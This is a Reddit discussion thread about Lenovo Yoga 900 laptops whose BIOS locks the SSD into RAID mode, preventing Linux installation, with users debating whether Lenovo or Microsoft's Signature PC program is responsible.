https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206 - The forum thread for the Yoga 900 ISK2 -UPDATE - The forum thread on Lenovo's website is back up. It was deleted for a while, but now they've re-posted it in a locked state. *sigh*

Here is Google's cache of the forum in case it disappears again: https://webcache.googleusercontent.com/search?q=cache:abMCb7w2uAoJ:https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206+&cd=1&hl=en&ct=clnk&gl=za

I'm told that CataclysmZA is backing this up in the Wayback Machine. I want to thank them for this, since this is probably Lenovo's attempt at a late night shredding party before the news can pick up the story. (Update: Posted at the bottom.

Update: The Lenovo employee posted about locking the thread. Basically, he called me disruptive and then said that if they had to, they would turn on pre-approval so that nobody can comment anywhere on their support forum until they've read it and have made sure it won't embarrass them. Nice, huh? Don't address the issue. Don't say anything about whether the problem will be fixed. Don't re-open the thread. Just threaten and bully people with the "We can make sure your posts are never seen." option.

https://forums.lenovo.com/t5/Linux-Discussion/Installing-Ubuntu-16-04-on-Yoga-900S/td-p/3336715 - The thread for the problems with the 900S.

https://forums.lenovo.com/t5/Linux-Discussion/710S-Can-t-install-Linux-on-Ideapad-710S-how-do-you-disable-RAID/td-p/3432553 - The thread for the problem with the 710S.

Will the Yoga Book and the Yoga 910 have these problems? We don't know because they are not released yet, but we should know soon.

I've attached a screenshot of my review for the 900 ISK2 and Lenovo's reply.

http://imgur.com/a/niewu

So they admitted that this is now a requirement for Signature PCs. 

So be warned that if you buy a "Microsoft Signature PC", it may not be allowed to run Linux, per Microsoft.

The Yoga 900 ISK2 at Best Buy is not labeled as a Signature Edition PC, but apparently it is one, and Lenovo's agreement with Microsoft includes making sure Linux can't be installed.

----

UPDATE: I've sent emails out to several members of the media trying to shine some light on what Lenovo is up to. If anyone could help me ping some reporters I'd sure appreciate the help. So far I've contacted Adrian Kinglsey-Hughes, Steven J. Vaughan-Nichols, Michael Larabel of Phoronix, and Dr. Roy Schestowitz of Techrights. We've been discussing the issue on the Techrights IRC channel on Freenode, so Techrights might have something about this posted soon

----
I just commented for someone who is writing an article who asked me to speak. Here's part of what I said...

"I think that Lenovo's official reply is insufficient and carefully worded. They talk about how much they love to support Linux and then say that they don't support Linux on many of their own laptops. Actions speak louder than words, and there's no technical reason other than the BIOS RAID mode lock why the Yoga 900 ISK2 and other affected systems wouldn't be great Linux machines. I also think that locking down the thread and editing peoples comments and then blaming forum posters for being "disruptive" was uncalled for, and they're obviously trying to turn this around and make it seem like I am overreacting or somehow I'm at fault for what they did. And unfortunately, some of the media reports have taken up this narrative instead of looking into why Lenovo would do such things to their computers. There is no REAL issue with Linux not supporting these laptops other than the one Lenovo created. They need to make a BIOS patch that users can install, like other Ultrabook PC makers did, not more excuses."

"I think that [the BIOS RAID lock] was a deliberate design choice made by Lenovo, and I say that because the BIOS code that they use has AHCI mode available for the storage device, which Linux and Windows understand without any special drivers. Lenovo patched the code to remove the AHCI mode from the BIOS setup utility and then they wrote additional code to make sure that you can't set AHCI mode with an EFI variable using EFI shell. So, I'd say it's definitely deliberate, and can't see any LEGITIMATE reason why they would have. It isn't really faster, it makes recovering Windows from Microsoft's installer very difficult if you have to later. About the only thing putting a single SSD setup into RAID mode using the BIOS gives you is (a) Linux won't be able to use the storage and (b) greater potential for data loss."

"I think that Microsoft and Lenovo agreed to lock Linux out, and forcing RAID mode accomplishes that. In the last 11 months, nobody except one Lenovo forum poster that used a modded BIOS and an external flasher to get around Lenovo's signature check on BIOS updates has managed to install Linux on the Yoga models affected by this. I believe that Lenovo and Microsoft figured that if Linux ever did get driver support for this configuration, that it would be years after the product was released, so it might as well be forever. Most people replace their laptop every 5 years or less, so almost nobody would ever be able to run Linux on the Yoga laptops while in their designed service life."

Edit: If anyone has anymore problems with Lenovo deleting the thread, here's the Wayback Machine version.

Page 1 - https://web.archive.org/web/20160921064057/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206
Page 2 - https://web.archive.org/web/20160921064404/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/2
Page 3 - https://web.archive.org/web/20160921064603/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/3
Page 4 - https://web.archive.org/web/20160921064734/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/4
Page 5 - https://web.archive.org/web/20160921064900/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/5
Page 6 - https://web.archive.org/web/20160921064949/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/6
Page 7 - https://web.archive.org/web/20160921065152/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/7
Page 8 - https://web.archive.org/web/20160921065333/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/8
Page 9 - https://web.archive.org/web/20160921065450/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/9
Page 10 - https://web.archive.org/web/20160921065541/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/10
Page 11 - https://web.archive.org/web/20160921065644/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/11
Page 12 - https://web.archive.org/web/20160921065754/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/12
Page 13 - https://web.archive.org/web/20160921070115/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/13
Page 14 - https://web.archive.org/web/20160921070321/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/14
Page 15 - https://web.archive.org/web/20160921070440/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/15
Page 16 - https://web.archive.org/web/20160921070608/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/16
Page 17 - https://web.archive.org/web/20160921070806/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/17
Page 18 - https://web.archive.org/web/20160921070912/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/18
Page 19 - https://web.archive.org/web/20160921071051/https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/19
As mentioned by /u/Ashtefere here: https://www.reddit.com/r/linux/comments/53ri0m/warning_microsoft_signature_pc_program_now/d7vym2w


>Your post is being ~~deleted~~ locked because you don't have the whole story and are making a storm in a teacup.

>* The linux drivers for the NVME chipset in this laptop do not yet exist. No one is stopping them from being built.
* Signature edition PC's *must* be locked into their highest performing mode in bios - this happens to be the NVME raid mode in the bios
* Windows can't even see this because the chipset is so new, thus the extra driver needing to be loaded. 
* Lenovo have not yet built a linux version of this driver, but when they do you would also need to preinstall it or use a distro that includes it.
* Again, no one is stopping you from building the driver yourself.

>There is no 'lock' on this machine. It is horribly irresponsible for you to use that kind of language. 

>There is a lack of a linux driver, and the best buy/lenovo retards used the wrong language. Please calm down.

>There will be a driver eventually, when someone gives up their free time to make one. Or lenovo supply one, whichever happens first.

>I have a closet full of raid cards that have this exact same problem and I need to hunt for linux MDADM stuff to get them working.

EDIT: Yes, some of the language is questionable.  The only part I've changed is the part where it states this post is being deleted, but this has prompted legitimate discussion and deletion may not be wholly warranted.
I've been able to successfully get past Lenovo's lock through direct bios flashing. I'm looking into better solutions, hopefully I can find a way to do this without an external programmer. I was going to keep people updated from the Lenovo forum, but as this is no longer an option I will keep people updated from here. 

EDIT:
Here's an imgur album of some images through my process in getting this to work. 
http://imgur.com/a/ox4Ey 
[deleted]
Consider cross-posting on r/technology for visibility. Tech-minded people care about stuff like this, even when they're not using linux themselves.
All the more reason to buy those machines that do support Linux.
UPDATE: Lenovo admins just locked the forum thread.

Can someone repost this on Hacker News, please?
Everytime I consider buying a Lenovo product I am again reminded not to. Are there any majors brands now that have reasonably good Linux laptop support? And I mean not system76 or any of those companies. 
What *actually* stops it? Forced Secureboot? 

EDIT: I should read the screenshot, heh. Thanks for the heads up.
Surely Lenovo spyware is enough reason not to buy Lenovo in the first place? 
Well, they just deleted my post about their BIOS locks being part of the Signature Edition agreement with Microsoft from the Linux forum on Lenovo's website. Probably Mr. Microsoft MVP again...That was fast. If they want to bury the truth, then why did they admit on Best Buy's website that that's what they have done?
 
If their reply on Best Buy disappears now, I guess we all know why.
 
I would encourage everyone to get the truth out now, on sites they can't delete it from. Feel free to copy anything I post regarding this issue. I hereby put it all in the public domain.
How is this in any way legal?
I bought a Lenovo Yoga 900 back in July being fully aware that no method had been found yet to install Linux on the newer 13ISK2 models that have a NVMe SSD for ~$1400. It's beautiful and sleek, has the best specs no doubt but I felt **disgusted** the whole time I had it - why didn't I go for a Surface or a MBP or an XPS13 (identical specs) at the same price? 

At least I knew I would be able to at least run Linux on the Surface (there's an ongoing project) and well, the fact that if I put in that amount of money I might as well buy the role model that other laptops want to be.

So even though I can count on my soldering and hardware skills and would have been able to get the BIOS modded and reflashed (as one of the forum members did), I chose to return this laptop to the store. It was a big sigh of relief and I would double check before buying any Lenovo product now.
Actual explanation: https://mjg59.dreamwidth.org/44694.html
Well, my initial suspicions about conspiracy with Microsoft are now confirmed. Can't imagine anything more stupid than such agreement. Do they really think people will start using M$ shitty software just because of BIOS lock? Hope Lenovo will be sued for this nonsense because so many customers were misled.
I don't see a technical explanation anywhere here. What exactly are you saying Linux doesn't support? Booting an NVMe drive in Intel RST mode on a UEFI system? Linux typically supports using those SATA controllers in raid mode it is just more challenging to setup.
Microsoft <3 Linux... Yeah yeah
I'll never buy Lenovo
Can someone please ELI5: ? Is this along the same lines as wireless companies preventing you from unlocking your phone?
Your post is being deleted because you don't have the whole story and are making a storm in a teacup.

* The linux drivers for the NVME chipset in this laptop do not yet exist. No one is stopping them from being built.
* Signature edition PC's *must* be locked into their highest performing mode in bios - this happens to be the NVME raid mode in the bios
* Windows can't even see this because the chipset is so new, thus the extra driver needing to be loaded. 
* Lenovo have not yet built a linux version of this driver, but when they do you would also need to preinstall it or use a distro that includes it.
* Again, no one is stopping you from building the driver yourself.

There is no 'lock' on this machine. It is horribly irresponsible for you to use that kind of language. 

There is a lack of a linux driver, and the best buy/lenovo retards used the wrong language. Please calm down.

There will be a driver eventually, when someone gives up their free time to make one. Or lenovo supply one, whichever happens first.

I have a closet full of raid cards that have this exact same problem and I need to hunt for linux MDADM stuff to get them working.
Acer, ASUS, Toshiba, Dell, HP, MSI, Razer and VAIO also have 
"Signature Edition PCs"

Only mobiles.
I remember when in 2012 secure boot was announced for the new Windows 8. I am from Spain, and at that time a lawyer (Jose Maria Lancho[1]) that was the president of a Spanish LUG (Hispalinux) create a official complain to the European Commission about the Windows 8 certification program in relation with the requirements of Secure Boot.

At that time the certification program describe that one of the requirement was to have an option to disable SB via UEFI, but only for desktops and laptops, but not for tables. Now this option is not anymore required for the Windows 10 certification program. That point was one of the argument that we exposed in the complain.

Is very sad to see that the circle is closing as we predicted in the complain, and with this new Signature Edition thing a new movement in this direction. And so far, the European Commission is not doing anything in that regard, and less and less hackers, lawyers, and groups are fighting against this kind of movement.

[1] (Spanish) https://es.wikipedia.org/wiki/Jos%C3%A9_Mar%C3%ADa_Lancho
The fact that people keep buying Lenovo crap after all the shit they did boggles my mind.
[deleted]
Between this and superfish I will never buy Lenovo again.
Hi! Your thread made it to r/all, which is btw where I'm coming from. Wanted to say thanks for the warning, it's really something to be aware of. Also thanks for trying to contact media, this must be spread.

We need to have the choice of the operating system we want. Especially for Linux users as many interesting laptops on the market come with Windows pre-installed, we need the ability to at least dual boot. The Microsoft Windows license is included in the laptop price supposedly, so it should be up to the user to decide what to do with that license. 
[deleted]
Always Lenovo, isn't it?
The phrasing is unfortunate, but the Lenovo rep appears to be saying that the *SATA mode option in the BIOS* is "locked per our agreement with Microsoft". Having recently accidentally smashed a couple of Intel RST arrays by inadvertently booting Windows with the mode set to AHCI after a BIOS upgrade/Load Optimized Defaults, that's not a surprising requirement from Microsoft as it may well cause a similarly bad reaction when used with RST's Smart Response Technology feature that's used to build the HDD/SSD cache.

The problem would appear to be that although Linux does support Intel's RST (and therefore, there's no need to switch the SATA mode from RAID to AHCI), it *doesn't* yet support SRT. Get hacking on dmraid, md, or flashcache so that they understand the SRT metadata...

EDIT: It looks like a patch for mdadm to support SRT was written back in 2014, but I guess no-one's accepted it yet: https://lwn.net/Articles/596614/
Why is it good to buy a microsoft signature pc? Is it cheaper, has special features, comes in red, with a supercharger and hood scoops?

Just asking, i am not familiar with these fancy things here in the medieval times.
Ehh, lenovo. I've been a fan of thinkpads for ages, but after their malware incidents and now this, I don't think I'm buying anything from them again. Makes me sad :(
From what I was able to understand this is a specific issue with RAID drivers and a new RAID SSD configuration. Lenovo provided this driver only to Windows 10 signature ed, thus basically banning not only linux and others OS, but on older version of windows itself. Also normal non signature edition of win10 may also fail to install! Lenovo locked the option to disable raid in the bios, however a user on biosmods were able to unlock the hidden setting. Unluckly this bios is only flasheable with an external physical  programmer. The only other things that can be done it's to understand how this RAID mode works and using a clean room method create a simple driver for it.
The wall of text post is a lie. This has nothing to do with Microsoft. 

Apparently there is a bug with the Samsung NVMe PM951 SSD (or Linux doesn't support Intel RAID properly) where the Linux bootloader won't detect it in RAID mode. Seeing the same bug in XPS 13 and other systems. Possibly can be fixed with a firmware update to the SSD. 

Apparently you can't disable RAID mode in the BIOS of the Yoga 900 (13isk2), so you can't install Linux on the NVMe drive. 

This is just Lenovo's shitty QA. This has happened numerous times in the past with Lenovo (can't disable RAID mode or secure boot in BIOS). 

If you want to install Linux, go to a vendor that actually tests on Linux like Dell.


I wouldn't buy a Lenovo product at all after the malware stuff they tried, even if it was through Microsoft Signature.
God damn it. I really like my E431 Lenovo with Linux. I *thought* Lenovo would be my next laptop. Now I have to research this shit again for my next laptop. Blek.
Thanks for the heads up, no more Lenovo products for my family or business.
This is the most egregious monopolistic shit.
Shit like this is why stuff like the new Linux-subsystem on Windows is just hollow.  Remember, kids: ["Embrace, extend and extinguish" is the Microsoft model](https://en.wikipedia.org/wiki/Embrace,_extend_and_extinguish)!
Embrace, extend, extinguish in action
Can you please contact the FSF (http://www.fsf.org/about/contact) and EFF (https://www.eff.org/about/contact) and tell them your story?
Not a fan of Lenovo anyway, especially their Yogas.
I've published about this at Xataka (in Spanish) and contacted Lenovo representatives in Spain. At the moment I've got no news from them, but as many have pointed here it seems this is not Microsoft's fault, but Lenovo. 

http://www.xataka.com/ordenadores/lenovo-no-deja-instalar-linux-en-algunos-portatiles-el-bloqueo-de-la-bios-parece-impedirlo

Hopefully media coverage could help to push Lenovo forward and give an answer and a solution. 
Pitchforks..... Get your Pitchforks. Four for a dollar. Pitchforks! 
/u/BaronHK, you might want to edit this into your OP. 

Here's the Google cache for the forum thread: https://webcache.googleusercontent.com/search?q=cache:abMCb7w2uAoJ:https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206+&cd=1&hl=en&ct=clnk&gl=za

Lenovo's forum software doesn't delete an entire thread when it gets removed by the mods - instead, the first page's link gets removed. You can still navigate through, and read the rest of the thread, unhindered. 

For example: https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206/page/14

Someone has to start backing it up now!

Edit: I'm backing the pages up in the Wayback machine. This could take a while.

Edit #2: Also, it's possible that OP's forum link is actually broken because it's been shortened, possibly as a result of a copy-pasta from his post on the Ubuntu forums, which shortens links in a similar way. The thread might not be deleted at all, considering I can still navigate to the first page using this URL: https://forums.lenovo.com/t5/Linux-Discussion/Yoga-900-13ISK2-BIOS-update-for-setting-RAID-mode-for-missing/td-p/3339206
You guys we look crazy every time we post that Microsoft has prevented us from installing Linux and then an hour later it comes out that it was something else entirely.

If we could stop the witch hunts, or just delay them by like, a day? We might get better info and not look like a buch of nutcases.
I have a fairly high end Dell Inspiron that's less than a few months old which had Microsoft Signature Edition and I was able to install linux with bios boot, thankfully. But I wouldn't be surprised if Microsoft decided to make other manufacturers follow Lenovo in the near future.
contact eff and fsf asap what are you waiting for?
Well they just deleted my amazing x files post. So I guess I'll share here. 
https://livingauthorssociety.files.wordpress.com/2016/02/x-files-ufo-truth-out-there.jpg
Ran into the exact same thing. Just bought the 900 13ISK2 after reading a blog post that it was good to go for ubuntu. Also, knowing that Lenovo's linux track record is stellar, I didn't give it a second thought. Now I have a 1,400.00 brick.
psh why do you need to install linux when you can just use the ubuntu subsystem /s

thanks for the headsup, i'll be sure to spread the info
Why does this have anything to do with blocking Linux? 

Preventing idiot users from poking where they shouldn't and degrading their disk performance, sure.

Protecting the "Microsoft Signature" brand reputation by stopping small repair shops from reinstalling Windows in AHCI mode and gutting performance instead of using an install image with slipstreamed drivers, yup.

Deliberately blocking Linux? No.

Would it be nice if they'd used standard NVMe so that both stock Windows ISOs and Linux *Just Worked*™? Sure. But that's not what the hardware they chose supports, and just like every other piece of proprietary hardware out there, someone will have to write a Linux driver for it if they want it to work in Linux.

If just half the energy expended in raising pitchforks in this thread had been spent on doing that, we'd have the driver written, debugged and in queue for merge by now.
As if anyone needed yet another reason to avoid Lenovo
Can you run other Windows OS's on it i.e. Win7 or Win8?

Why would Microsoft be so worried about Linux? If anything, they should be terrified of people going back to Wnidows 7 and 8.



I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/hackernews] [Linux can't be installed on recent Lenovo laptops per a secret agreement with MS](https://np.reddit.com/r/hackernews/comments/53s25n/linux_cant_be_installed_on_recent_lenovo_laptops/)

- [/r/italyinformatica] [\[xpost \/r\/linux\] Warning: Microsoft Signature PC program now requires that you can't run Linux. Lenovo's recent Ultrabooks among affected systems.](https://np.reddit.com/r/ItalyInformatica/comments/53sfv7/xpost_rlinux_warning_microsoft_signature_pc/)

- [/r/linuxactionshow] [Microsoft Signature PC program now requires that you can't run Linux \[x-post from \/r\/linux\]](https://np.reddit.com/r/LinuxActionShow/comments/53s4gs/microsoft_signature_pc_program_now_requires_that/)

- [/r/programming] [Warning: Microsoft Signature PC program now requires that you can't run Linux. Lenovo's recent Ultrabooks among affected systems (from \/r\/linux)](https://np.reddit.com/r/programming/comments/53sa9l/warning_microsoft_signature_pc_program_now/)

- [/r/reddit5000] [\[linux\] Warning: Microsoft Signature PC program now requires that you can't run Linux. Lenovo's recent Ultrabooks among affected systems.](https://np.reddit.com/r/reddit5000/comments/53sur0/linux_warning_microsoft_signature_pc_program_now/)

- [/r/seagray] [https:\/\/www.reddit.com\/r\/linux\/comments\/53ri0m\/warning\_microsoft\_signature\_pc\_program\_now\/](https://np.reddit.com/r/seagray/comments/53t3kj/httpswwwredditcomrlinuxcomments53ri0mwarning/)

- [/r/stallmanwasright] [Windows 10 locked in on "signature edition" computers](https://np.reddit.com/r/StallmanWasRight/comments/53s4a7/windows_10_locked_in_on_signature_edition/)

- [/r/sysadmin] [Warning: Microsoft Signature PC program now requires that you can't run Linux. Lenovo's recent Ultrabooks among affected systems \[xpost from \/r\/linux\]](https://np.reddit.com/r/sysadmin/comments/53skq0/warning_microsoft_signature_pc_program_now/)

- [/r/technology] [Microsoft Signature PC program now requires that you can't run Linux. Lenovo's recent Ultrabooks among affected systems. \[xpost \/r\/linux\]](https://np.reddit.com/r/technology/comments/53rr07/microsoft_signature_pc_program_now_requires_that/)

- [/r/technology] [\[cross-posted from \/r\/linux\] Warning: Microsoft Signature PC program now requires that you can't run Linux. Lenovo's recent Ultrabooks among affected systems.](https://np.reddit.com/r/technology/comments/53rq68/crossposted_from_rlinux_warning_microsoft/)

- [/r/thinkpad] [\[XPOST\] Warning: Microsoft Signature PC program now requires that you can't run Linux. Lenovo's recent Ultrabooks among affected systems. • \/r\/linux](https://np.reddit.com/r/thinkpad/comments/53s518/xpost_warning_microsoft_signature_pc_program_now/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
The worse part about this is that I really, really love Lenovo computers. I mean obviously this is a shitty thing for them to do, but there's always other manufacturers, but none that make laptops that I like as much as I like thinkpads. Even if this doesn't trickle to other Lenovo laptops than the YOGA it still leaves a bad taste in my mouth.
Can anyone tell me why there is the "misleading title" tag?
I hope someone from Lenovo is reading this...

I own a number of Lenovo products:

* T400
* X61
* Yoga Tablet 2 Pro
* X1 Carbon

My first step after purchase has always been to  wipe the hard drive and install a linux-based OS.

I was very happy with my T400 and X61.

I was very happy with my tablet at first, but after running an update, I lost the ability to mount my tablet as an external drive.
This forces me to use network-based transfer methods, which makes it fairly annoying to use.
Fortunately, I have a background in web development, so I have ways of working around limitations, but I'd rather these steps were not necessary.

My X1 Carbon (purchased for me by my employer) made it significantly more difficult to install Linux (though I understand that this is a widespread trend in the industry).
After a day of working on the various hardware problems, I managed to get everything working, but there have been various issues since which I've simply put up with.

I've wasted enough time on these issues, and yet here I am putting more effort into writing this because I care about the open source (software/hardware) ecosystem.

Maybe Lenovo will surprise me and go well out of their way to address these problems. More likely, they will not, and my next computer will not be made by Lenovo.

I'm currently in Mozilla's space in Paris, France, for a conference on open source technology. I'm presenting later today on the topic of corporate accountability (with regards to security practices).
I say this because I want Lenovo to know that I am a jerk, and I will take time from my future presentations to tell others working in this space NOT TO BUY LENOVO.

When you shut down your forums, people like me take it upon themselves to ruin your business in every way we can.
We will take to reddit, twitter, and other forums that have much higher view counts than your platforms.

Maybe consider developing some Linux drivers yourself, next time?
Proprietary lock-in will hurt your business. Do something about it NOW.

thanks.
6000+ likes for a kneejerk overextended interpretation of a very vague and easily misunderstood, hastily put together tech support response.

Nice going.
Every couple of months you get another reason not to buy their stuff. 
2016 - people still buying Lenovo crap
Hello! Alex from TechRaptor here. Just wanted to drop in to let you guys know that we reported on this issue and Lenovo issued a statement to us based on our reporting.

https://techraptor.net/content/lenovo-windows-10-linux
Yup, I was told I was stupid and paranoid when secure boot came out. Heh, I knew this would come down the pipe eventually though. Just do things inch by inch and people will swallow any bullshit.

EDIT: Secure Boot was an attempt to lock out linux that didn't work, this is a continuation of a similar goal.
Bot! Beep beep! I'm all about top posts!

This post had 5,000 upvotes and got posted to twitter [@Reddit5000](https://twitter.com/Reddit5000) and subreddit /r/reddit5000!

The tweet: https://twitter.com/Reddit5000/status/778569518415089664

--------------------

^^All ^^7,500 ^^upvotes ^^are ^^on ^^[@Reddit7500](https://twitter.com/Reddit7500) ^^and ^^/r/reddit7500

^^And ^^most ^^importantly ^^all ^^10,000 ^^posts ^^on ^^[@Reddit10000](https://twitter.com/Reddit10000) ^^and ^^/r/reddit10000
Lenovo are now saying that it's a driver issue:

http://www.techrepublic.com/article/lenovo-denies-deliberately-blocking-linux-on-windows-10-pcs/

Regardless of how you feel about Linux, you should be angry that manufacturers are locking you into one OS. You bought the computer, you should be able to do what you want with it.
well, another blacklisted brand for me, proudly joining sony and a few others on the wall of shame.
>why the SSD is locked in a proprietary RAID mode that Linux doesn't understand

Sounds like the RAID setup is the issue.  Its a proprietary driver and LINUX has none available.  Sounds like the BIOS RAID is the issue, and that one of you should really write a linux driver... I mean you are all uber open source hackers... right???

And unless they SPECIFICALLY stated it 'runs linux' they are not in any trouble.  They optimized the laptop of a different OS.  How is that illegal?
Microsoft got nailed on this with Dell, specifically, back in the 1990s. And people wonder why I always say, "You can't trust Microsoft!" 

Waiting for obligatory reddit downvote into oblivion.
[deleted]
Citation neede for this tosh. And no, a one liner from the drooling simpletons that respond in online help forums doesn't count.
Why are people still buying Lenovo?
Good old Microsoft. Now i recognize you. For a while a was scared about your friendliness for FLOSS. 
why does anyone buy lenovo's bullshit anymore? wasnt the whitelisted hardware enough? Wasnt the spyware enough? wasnt the fake SSL authority enough?

They're a shitty company.
damn it.... guess what im waiting for the mail man to bring 
I bought a Lenovo Yoga tablet for the high resolution and kick stand, and tried to install Linux on it, but the BIOS were also locked down in a weird way and I couldn't use `adb` to flash it :/.
>stocks up on beloved X230's
[deleted]
Really sucks how Lenovo now owns the ThinkPad :-(
That's despicable.
Good thing the ThinkPad line isn't garbage
People in the thread say they can't even clean install windows 10 pro either on that thing. 
Makes no sense for MS to ask lenovo to block its own OS. 
Looks to me like a 100% lenovo screw up and they are just telling BS.
This is why my machine is a MacBook Air running Linux.

They are pure EFI machines, pure sex.
This is a good time to mention https://download.lenovo.com/pccbbs/thinkcentre_bios/9sj995usa.txt, with the quote "Fixes the issue of installing Redhat 6.3." (If you don't remember: https://mjg59.dreamwidth.org/20187.html)
Doesn't seem to be the case on anything but Lenovo.
I just want to point out that this **does not** affect all Signature Edition systems. My Dell laptop runs Ubuntu just fine. But in fairness it hadn't even crossed my mind that there could be a problem installing Linux on a Signature Edition. Next time I'll avoid these systems altogether. Why take the risk?
I looked up the Leno Yoga 900... and as far as I can find it can ONLY have 1 drive...  so what kind of RAID only uses 1 drive ????
Wasn't Lenovo also caught preloading their machines with adware/spyware a couple of years ago?

What a shitty company.
I know people who work for Lenovo (Motorola) and they run only Linux! Good work OP!
LOL at all the people who thought Microsoft was Linux friendly now that they cross compiled/hacked bash to work in Windows. 
And theyll keep on with the facade that their intentions are purely to make this world a better place and absolutely have 0% to do with competition.
Great. Both of the posts are now on r/all. We did it guys.


Just another case of when silencing goes bad.
Here from r/all. 

I don't know shit about Linux but you should give a class on how to properly hold onto and distribute caches of webpages. Excellent work on that front. 

Have an upvote on me, good sir. 
In france it is 100% illegal, you can't force an OS on people.
Give Thinkpad back to IBM plz
Consider pinging the Ars Technica folks, this seems right up their alley. All of them are on the twits.
This is probably why the EU doesn't have the Signature PCs
Well this is an antitrust lawsuit waiting to happen
I would much rather buy dell, system 76 (or similar. If they sell in your country.)

Both are very supportive of Linux unlike lenovo.

If Sony still made laptop that would have been in my short list. I never had any problems on any sony laptops and my current one is from Sony. The replacement will surely be an something dell 15.
I dont't know which brand my next machine will be.
But I know it's not going to be a lenovo.
That would make my laptop useless for me, since the first thing I always do is getting rid of Windows and installing Linux. I should be able to install whatever I want on my laptop, as long as it's legal. This is just ridiculous and I am surprised it is not illegal.
Showing that "Microsoft loves linux" is a fat fucking lie. 
Why are people still buying Lenovo products anyway?  Everyone already forget how they screwed us previously?

There are plenty of manufacturers that make those flip laptops  (I have an asus one with dedicated graphics and an i7 for cheaper than the yoga)
For Canadians you can file a complaint with the Competition Tribunal [here](https://e-filing-depot-e.ct-tc.gc.ca/login-eng.aspx?E-Filing=+English+).

You need to register an account before you can access the service.

The Competition Tribunal can also be contacted by phone: `613.957.3172` and email `filing.depot@ct-tc.gc.ca`
That can't be true; Microsoft ❤ Linux!
LAWSUIT. 
The community's reaction seems absurd to me.

For whatever reason, the device only exposes some sort of RAID controller to the OS, and for whatever reason, there's no working option for exposing a more standard AHCI interface instead. The problem is that Linux doesn't (yet) have a driver for that RAID controller.

Okay, great. Linux doesn't yet support particular piece of hardware. News at 11.

Just like usual, if you want odd hardware to work on Linux, you'll have to write some drivers. That's just how it is. This is nothing new or scandalous. The reasons why Lenovo doesn't support AHCI don't matter. They don't, so now somebody must write a driver for what they do support. Once that happens, nobody will complain anymore. It's that simple. Nothing is being locked with Secure Boot; nothing is being locked with crypto; there is no DRM at play. If you want hardware support, write a driver.

As for all the Lenovo-bashing going on here... My personal experience with my new Thinkpad P50 has been overwhelmingly positive. It's working on Gentoo Linux entirely: https://wiki.gentoo.org/wiki/Lenovo_ThinkPad_P50
Shades of the antitrust lawsuit from the '90s...

You'd think they would be prevented from doing this, ya know?
Are they _trying_ to get sued? Microsoft lost a lawsuit very similar to this case only a decade ago to the tune of billions of dollars.
>Microsoft ♥ Linux

Haha no.
Bu.. bu... Bu.. but Microsoft <3's Linux!
[deleted]
Is there a way to see if my HDD/BIOS has this issue without potentially wiping the drive?

I have an Acer E5 but linux can't communicate with the internal HDD, its a hybrid drive with windows 8.1(clean install).
God help us if this contract Lenovo signed affects the retro thinkpad line
Regardless of this very problematic lockdown, I wanna say I'm really happy we have the Wayback Machine.
Why you would trust Lenovo at all after Superfish beats me.
That's ridiculous. Many colleges have classes that require Linux and some of these computers are very popular with college students.
Vote with your wallet. Stop buying Lenovo.
http://www.businessinsider.com/fbi-phone-texas-church-shooter-devin-kelley-2017-11

As the article says, the FBI can't get into the shooter's phone, and we all know that means that a horde of "cybersecurity experts" from think tanks will now go on TV saying how encryption is dangerous and that the government needs a way to get in to encrypted devices.
